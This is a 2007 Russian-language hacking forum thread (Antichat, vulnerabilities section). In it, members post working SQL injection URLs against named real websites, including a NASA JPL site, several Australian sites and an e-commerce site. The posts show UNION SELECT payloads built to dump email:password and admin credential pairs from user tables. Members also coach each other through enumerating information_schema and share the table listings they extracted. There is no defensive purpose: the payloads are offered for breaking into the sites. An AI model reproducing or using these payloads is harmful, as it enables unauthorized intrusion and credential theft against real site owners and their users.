ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3001  
Старый 30.08.2007, 21:47
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

http://soc.jpl.nasa.gov/experience/gallery-story.cfm?id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,char( 47)%2bchar(47)%2bchar(45)%2bchar(45)%2bchar(62)%2b char(60)%2bchar(98)%2bchar(114)%2bchar(62)%2bchar( 60)%2bchar(47)%2bchar(101)%2bchar(109)%2bchar(62)% 2bemail%2bchar(58)%2bpassword%2bchar(60)%2bchar(33 )%2bchar(45)%2bchar(45),11,null,13,14,15,char(16), char(17),null,19,20%20from%20usersmember--s
 
Ответить с цитированием

  #3002  
Старый 30.08.2007, 22:51
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.onlymelbourne.com.au/melbourne_details.php?id=-1+union+select+1,2,3,concat(admin_id,char(58),pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45+from+admin/*
не смог подобрать имя юзверя


http://www.gertrude.org.au/exhibition.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
тут вообще хрен знает какая таблица

http://www.defenceandindustry.com.au/category.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( username,char(58),password),0x17),0x17),4,5,6,7,8, 9,10,11,12,13+from+users/*
какие это юзеры - хрен знает

http://www.strawtec.com.au/content.php?id=-1+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENC RYPT(concat(username,char(58),password),0x17),0x17 ),10,11,12+from+users/*
тоже самое непонятно откуда пароли

http://www.via-rs.net/acontece/index.php?inc=categoria&cod_categoria=-1+union+select+concat(mail,char(58),password)+from +survey_admin/*

Последний раз редактировалось Termin@L; 30.08.2007 в 22:57..
 
Ответить с цитированием

  #3003  
Старый 31.08.2007, 02:22
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

вот такой вот ужаснейший скуль я нашел

код:

http://www.whoiswho.crimea.ua/view_org.php?record=-1385'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80, 81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97 ,98,99,100,101,102,103,104,105,106,107,108,109,110 ,111,112,113,114,115,116,117,118,119,120,121,122,1 23,124,125,126,127,128,129,130,131,132,133,134,135 ,136,137,138,139,140,141,142,143,144,145,146,147,1 48,149,150,151,152,153,154,155,156,157,158,159,160 ,161,162,163,164,165,166,167/*

и что с этим можно сделать?
 
Ответить с цитированием

  #3004  
Старый 31.08.2007, 08:02
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Цитата:
Сообщение от Termin@L  
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
тут вообще хрен знает какая таблица
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),user(),version(),4,5,6,7 ,8,9,10/*
.ud.rt - @l.ud.rt
4.1.20

http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),2,version(),user(),5,6,7 ,8,9,10/*
.ud.rt - ..
4.1.20
gertrude@localhost
______
сейчас дальше попробую раскопать..
 
Ответить с цитированием

  #3005  
Старый 31.08.2007, 16:13
Аватар для phol1eadeux
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

Код:
http://www.hww.ca/media_viewer2_top.asp?Language=E&id=203+OR+1=@@version
Таблица 'HWW_VIEW_User_Accounts'
Колонки
Цитата:
ID
First_Name
Last_Name
Organization_ID
Phone
Email
Username
Password
 
Ответить с цитированием

  #3006  
Старый 31.08.2007, 18:30
Аватар для n3m0
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

http://www.maup.com.ua/news/news.php?idn=-140+union+select+1,2,user(),database(),5,6,7,8,9,1 0,11,12,13/*
Дальше не нарыл! Помогите
 
Ответить с цитированием

  #3007  
Старый 31.08.2007, 18:50
Аватар для n3m0
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/*
Нужно довести до ума
 
Ответить с цитированием

  #3008  
Старый 31.08.2007, 18:54
Аватар для phol1eadeux
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

Цитата:
Сообщение от n3m0  
http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/*
Нужно довести до ума
Что мешает, 5 мускул, доводи:
Код:
http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5+from+information_schema.tables/*
 
Ответить с цитированием

  #3009  
Старый 31.08.2007, 18:54
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Ну вот чуть "доведенная до ума"
Тут пятый мускул. Остается только копаться в таблицах
http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5%20from%20infor mation_schema.tables/*


Пока писал кто-то раньше успел.... блин.
 
Ответить с цитированием

  #3010  
Старый 31.08.2007, 20:55
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

protermos.ru
Код:
http://www.protermos.ru/kvl.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,88,table_name,0,1,2,3,4,5,6,7,888,99,0,1,2,3,4,5,6,7,8888,9,0,1,2,3,4,5,6,7,88888,99,0,1,2+from+information_schema.tables/*
version: 5.*
tables:

Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
address_book
address_format
banners
banners_history
categories
categories_description
configuration
configuration_group
counter
counter_history
countries
currencies
customers
customers_basket
customers_basket_attributes
customers_groups
customers_info
faqdesk
faqdesk_categories
faqdesk_categories_description
faqdesk_configuration
faqdesk_configuration_group
faqdesk_description
faqdesk_reviews
faqdesk_reviews_description
faqdesk_to_categories
geo_zones
languages
manufacturers
manufacturers_info
newsdesk
newsdesk_categories
newsdesk_categories_description
newsdesk_configuration
newsdesk_configuration_group
newsdesk_description
newsdesk_reviews
newsdesk_reviews_description
newsdesk_to_categories
newsletters
orders
orders_products
orders_products_attributes
orders_products_download
orders_status
orders_status_history
orders_total
phoroom_auth_access
phoroom_banlist
phoroom_categories
phoroom_config
phoroom_disallow
phoroom_forum_prune
phoroom_forums
phoroom_groups
phoroom_posts
phoroom_posts_text
phoroom_privmsgs
phoroom_privmsgs_text
phoroom_ranks
phoroom_search_results
phoroom_search_wordlist
phoroom_search_wordmatch
phoroom_sessions
phoroom_smilies
phoroom_themes
phoroom_themes_name
phoroom_topics
phoroom_topics_watch
phoroom_user_group
phoroom_users
phoroom_vote_desc
phoroom_vote_results
phoroom_vote_voters
phoroom_words
products
products_attributes
products_attributes_download
products_description
products_notifications
products_options
products_options_values
products_options_values_to_products_options
products_prop_options
products_prop_options_values
products_prop_options_values_to_products_prop_options
products_properties
products_to_categories
proterm_pages
proterm_pages_categories
protherm_klo
protherm_plo
protherm_tlo
reviews
reviews_description
sessions
shablon_pages
specials
tax_class
tax_rates
whos_online
zones
zones_to_geo_zones
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ